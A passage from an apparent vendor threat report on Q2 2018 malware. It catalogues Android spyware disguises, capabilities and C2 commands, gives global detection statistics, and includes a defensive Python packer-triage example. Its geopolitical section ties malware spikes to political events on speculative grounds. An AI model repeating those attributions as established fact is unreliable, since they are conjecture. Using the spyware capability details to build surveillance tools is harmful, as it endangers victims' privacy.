If the victim is a CEO, politician, or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content. Intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.
Today, spying is the number one purpose of Android malware. In Q2, Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.
The digital spooks
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, ID, name, phone numbers, and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type), and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server (recorded as httphttpcgalimcomadminhrpupuphpdo=upload).
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps, and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity. Then it sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls, and creates a list of the files on the device. It also extracts the web history, account and contact details, and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of disseminating the malware was social networks.
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio, and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata, and makes changes on the victim's device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64, and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details, and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of the previous versions, it includes some additional tricks:
Extracts photos, audio, and videos
Records screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messenger data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details, and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: FaceBook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy, and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset call forwarding
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes between multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can block access to some websites, including Google Chrome, the Google Play store, Gmail, and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, operates mostly on Iranian territory. It uses third-party app stores, social networks, and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver, and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers, and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via ... another cryptominer named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it, and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim: thief robbing thief.
This story clearly illustrates the cybersecurity situation in Q2. No one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda, and over 300 more.
The bubble chart shows that in Q2 2018, Russia (ru), Turkey (tr), and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses them over a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected. Microsoft describes it as a "multi-threaded, polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany, and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za), and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people by the FBI in 2012 for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans, and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem, or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a graphical user interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo's Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction, and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits
Computer Exploits comprise software, chunks of data, or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation, or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware, and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools, and Malware Packers.
5.3.1 Constructors

Constructors are applications used to generate malware files automatically.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft rates this program as a "Severe" threat to PC users.

In Q2, Germany (de) was the top country of detection for constructors.

The timeline shows that Germany not only had a serious problem with constructors in Q2 but also that this malware is likely a persistent threat to German networks.
5.3.2 Packers

"Packed" malware is malicious executable code that has been hidden or obfuscated by compressing ("packing") it inside a larger, seemingly innocuous program or data stream. The hostile code can even take the form of scripts. The packed data usually ships with its own decompression stub, or is a self-extracting archive, which rebuilds the original code at run time and then executes it. Encryption may be layered on top of the compression to further conceal the malware from security software. The practical consequence for defenders is that static signatures see only the stub and a high-entropy blob: the real code exists only after unpacking, so detection has to rely on the stub itself, on section layout and entropy, or on behavior once the sample runs.

MUPX, a modified "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous executable formats and operating systems and uses the open-source UCL compression library; its decompressor stub is only a few hundred bytes of code. Attackers modify the stock packer (renaming its sections, patching the stub) precisely so that a plain "upx -d" no longer unpacks the file and stock UPX signatures no longer match.

In Q2 2018, Russia was the #1 home of malware packers.

The timeline shows that Russia had the most persistent packer problem, while Iran had the highest periodic spikes.
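The following Python is an added example, not part of the report. It shows the static checks an analyst applies to a PE file to decide whether it is packed: it parses the section table and flags UPX-style section names, a first section with no raw data but a large virtual size (the area the stub unpacks into), and raw data whose Shannon entropy is close to 8 bits per byte. The build_pe() helper constructs minimal synthetic PE32 images for the demonstration; they are not real samples, and the pseudo-random blob simply stands in for compressed code.

```python
"""Static packer triage of a PE file: parse the section table and flag the
signs a UPX-style packer leaves behind.  Added example; build_pe() constructs
minimal synthetic PE images for the demonstration, they are not real samples."""
import hashlib
import math
import struct

FILE_ALIGN = 0x200
SECTION_ALIGN = 0x1000
# Section names left behind by stock UPX and a few other common packers.
PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".UPX0", ".UPX1",
                        "MPRESS1", "MPRESS2", ".aspack", ".adata", ".petite"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, close to 8.0 for compressed/encrypted data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def _align(value: int, boundary: int) -> int:
    return (value + boundary - 1) // boundary * boundary


def build_pe(sections):
    """Constructed minimal PE32 (DOS stub, PE signature, COFF header, zeroed optional
    header, section table, raw data).  `sections` = [(name, virtual_size, raw_bytes)]."""
    opt_size = 224                                # size of a PE32 optional header
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)       # e_lfanew: PE header right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)         # PE32 magic
    header_len = 0x40 + 4 + len(coff) + opt_size + 40 * len(sections)
    raw_ptr = first_raw = _align(header_len, FILE_ALIGN)
    va = SECTION_ALIGN
    table, blobs = b"", b""
    for name, vsize, raw in sections:
        raw_size = _align(len(raw), FILE_ALIGN) if raw else 0
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, va,
                             raw_size, raw_ptr if raw else 0, 0, 0, 0, 0, 0xE0000020)
        if raw:
            blobs += raw.ljust(raw_size, b"\0")
            raw_ptr += raw_size
        va += _align(max(vsize, raw_size), SECTION_ALIGN)
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return headers.ljust(first_raw, b"\0") + blobs


def parse_sections(pe: bytes):
    """Walk the PE section table; one dict per section, including raw-data entropy."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    n_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size              # section table follows the optional header
    out = []
    for i in range(n_sections):
        name, vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        data = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        out.append({"name": name.rstrip(b"\0").decode("latin-1"), "vsize": vsize,
                    "raw_size": raw_size, "entropy": round(shannon_entropy(data), 2)})
    return out


def assess_packing(pe: bytes) -> dict:
    reasons = []
    for s in parse_sections(pe):
        if s["name"] in PACKER_SECTION_NAMES:
            reasons.append(f"packer section name {s['name']}")
        if s["raw_size"] == 0 and s["vsize"] >= 0x10000:
            reasons.append(f"{s['name'] or '<unnamed>'}: no raw data but {s['vsize']:#x} bytes virtual (unpack area)")
        if s["raw_size"] and s["entropy"] > 7.0:
            reasons.append(f"{s['name']}: entropy {s['entropy']} (compressed or encrypted)")
    return {"packed": bool(reasons), "reasons": reasons}


# Constructed samples: 4096 deterministic pseudo-random bytes stand in for the compressed image.
_PACKED_BLOB = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
SAMPLE_PACKED = build_pe([("UPX0", 0x20000, b""), ("UPX1", 0x1000, _PACKED_BLOB),
                          (".rsrc", 0x200, b"\0" * 0x200)])
SAMPLE_PLAIN = build_pe([(".text", 0x1000, b"\x55\x8b\xec\x83\xc4\x10\x5d\xc3" * 128),
                         (".data", 0x200, b"\0" * 0x200)])
```

The section-name check is the one a modified packer such as MUPX defeats first, simply by renaming UPX0/UPX1; the empty-first-section layout and the entropy of the packed section survive the rename, which is why all three signals are reported. High entropy alone is not a verdict: legitimately compressed resources, .NET assemblies and signed installers also score above 7, so treat the result as triage that decides whether the sample goes to an unpacker or a sandbox.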
5.3.3 Email Flooders

Email flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down: a form of denial-of-service (DoS) attack.

The one email flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as spreading not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

The timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools

Virtual tools are programs that modify or alter malicious files so that they evade detection.

The top virtual tools Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for virtual tool detections were Germany and the US.

The timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes

"Joke" malware is just what the name says: non-malicious applications that claim to take a malicious action but are in fact only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically rated only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for joke malware.

The timeline shows that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications

In this section we cover the range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nevertheless detects and flags them as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings. The last item deserves attention, because a silently changed DNS server lets the operator redirect every name lookup the machine makes.

The bubble chart shows that the US and Mexico were the most common countries in which Comodo detected these types of application.

Finally, the timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications

The unwanted application category is alarming because users often install these programs inadvertently in the course of ordinary computer and Internet activity. Examples include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.

The most common unwanted application Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".

As the bubble chart shows, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

As the timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functions but in fact do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be bundled with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

The timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with unsafe applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis

In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details malware distributions for twenty-two vertical markets, from automotive to travel, covering four dangerous malware types: backdoors, trojans, viruses and worms. Further, the diagram lists the #1 malware family for each vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in one but in multiple verticals, which clearly makes them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now also targets email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, "Zbot", another name for the "Zeus" trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing, sometimes supported by a social-engineering scheme that falsely claims the target's computer is already infected with a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create a unique malware profile for each vertical, providing cyber intelligence that clarifies the primary malware threats and focuses limited time and resources against them.
7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. The major spike on March 13 clearly stands out. What happened on that day in the US, and what might explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. One likely reason for the dramatic rise in detections is that intelligence agencies around the world suddenly received a raft of new collection requirements: requests for information about upcoming changes in US political, military and intelligence activities. These agencies then set out to fulfill those requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The likely reason for this massive spike is that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? It is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the information on which intelligence reporting is based. This graph shows Comodo's trojan detections in South Korea during Q2 2018. The highest spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea

The chart shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to connect with the outside world. Comodo's further research identified the detected files as Windows activation ("cracking") software and Chinese-made anti-censorship programs.
7.5 Armenia

All major geopolitical events today are bathed in malware, because almost all activity, from social life to business, politics and national security, is now conducted online. This is especially true in times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. This timeline provides ample evidence: Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus

A common hacker refrain is that "information wants to be free". This timeline of Comodo's virus and trojan detections in Belarus in Q2 2018 offers evidence for it. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojans, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with electoral events. In mid-April, Iraq was preparing for a national election, including the question of how best to secure its electronic components. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be several reasons at once. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had multiple causes. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day and Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting: it came a mere day after the Russian government called a Croatian decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity revealed that it took place almost exclusively in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends that are likely to influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but also presage possible future cybersecurity scenarios.

The increase in trojan malware in the last quarter means that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in infection of hosts worldwide with a wide diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in its persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell for attacks are clear evidence of this growth in sophistication.

